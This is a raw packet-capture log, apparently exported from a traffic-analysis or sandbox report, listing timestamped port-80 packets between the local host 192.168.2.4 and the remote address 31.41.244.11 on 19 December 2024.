                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.487029076 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.487091064 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.488046885 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.488215923 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.488266945 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.489131927 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.489186049 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.489191055 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.489233017 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.490166903 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.490220070 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.490279913 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.490336895 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.491255045 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.491306067 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.491398096 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.491452932 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.492361069 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.492417097 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.492477894 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.492580891 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.493467093 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.493545055 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.493573904 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.493623018 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.494529963 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.494658947 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.494713068 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.495629072 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.495686054 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.495749950 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.495805025 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.496758938 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.496814966 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.496834040 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.496881962 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.497802019 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.497853994 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.497889042 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.497947931 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.498922110 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.498975039 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.498974085 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.499020100 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.499970913 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.500020981 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.500063896 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.500124931 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.501068115 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.501197100 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.501244068 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.502145052 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.502197981 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.502264023 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.502319098 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.503262043 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.503335953 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.503348112 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.503401041 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.504363060 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.504492044 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.504578114 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.505424976 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.505484104 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.505547047 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.505692005 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.506524086 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.506592035 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.506664991 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.506714106 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.507960081 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.508013964 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.508075953 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.508128881 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.508642912 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.508692980 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.643446922 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.643563032 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.643568993 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.643620968 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.644048929 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.644095898 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.644104004 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.644153118 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.645103931 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.645204067 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.645220041 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.645243883 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.646156073 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.646209002 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.646248102 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.646614075 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.647290945 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.647355080 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.647414923 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.647464037 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.648329973 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.648475885 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.648487091 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.648519039 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.649431944 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.649487972 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.649564028 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.649620056 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.650533915 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.650636911 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.650665998 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.650712967 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.651611090 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.651659966 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.651720047 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.651762009 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.652699947 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.652815104 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.652874947 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.653840065 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.653899908 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.653950930 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.654015064 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.654882908 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.654983044 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.655014038 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.655049086 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.655986071 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.656039953 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.656096935 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.656150103 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.657053947 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.657108068 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.657181978 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.657233000 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.658181906 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.658233881 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.658237934 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.658279896 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.659236908 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.659286976 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.659360886 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.659430027 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.660340071 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.660388947 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.660463095 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.661400080 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.661465883 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.661510944 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.661566973 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.662504911 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.662631035 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.662684917 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.663629055 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.663680077 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.663717031 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.663774967 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.664674044 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.664796114 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.664853096 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.665793896 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.665858030 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.665894985 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.665982008 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.666840076 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.666903019 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.666964054 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.667062044 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.667947054 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.668061972 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.668113947 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.669008017 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.669070959 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.669146061 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.669207096 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.670124054 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.670181036 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.670238018 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.670312881 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.671228886 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.671289921 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.671344995 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.671395063 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.672317982 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.672373056 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.672424078 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.672472954 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.673386097 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.673425913 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.673499107 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.673549891 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.674510956 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.674582005 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.674644947 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.675570965 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.675698042 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.675700903 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.675748110 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.676670074 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.676791906 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.676843882 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.677831888 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.677887917 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.677948952 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.678006887 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.678864002 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.678978920 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.679039001 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.679929018 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.679990053 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.680051088 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.680124044 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.681019068 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.681075096 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.681133986 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.681348085 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.682107925 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.682163000 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.682220936 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.683191061 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.683240891 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.683310986 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.683373928 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.684295893 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.684345007 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.684420109 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.684477091 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.685386896 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.685440063 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.685498953 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.685798883 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.686463118 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.686588049 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.686642885 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.687576056 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.687628031 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.687668085 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.687719107 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.688677073 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.688734055 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.688766956 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.688817024 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.689722061 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.689779997 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.689841032 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.690030098 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.690831900 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.690891027 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.690941095 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.690994024 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.691921949 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.692048073 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.692100048 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.693022966 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.693073988 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.693125963 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.693176985 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.694159031 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.694252014 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.694299936 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.694349051 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.695203066 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.695347071 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.695400000 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.696269989 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.696311951 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.696387053 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.696443081 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.697360992 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.697412968 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.697470903 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.697592020 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.698443890 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.698496103 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.698554993 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.698604107 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.699565887 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.699667931 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.699687004 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.700032949 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.700568914 CET804983831.41.244.11192.168.2.4
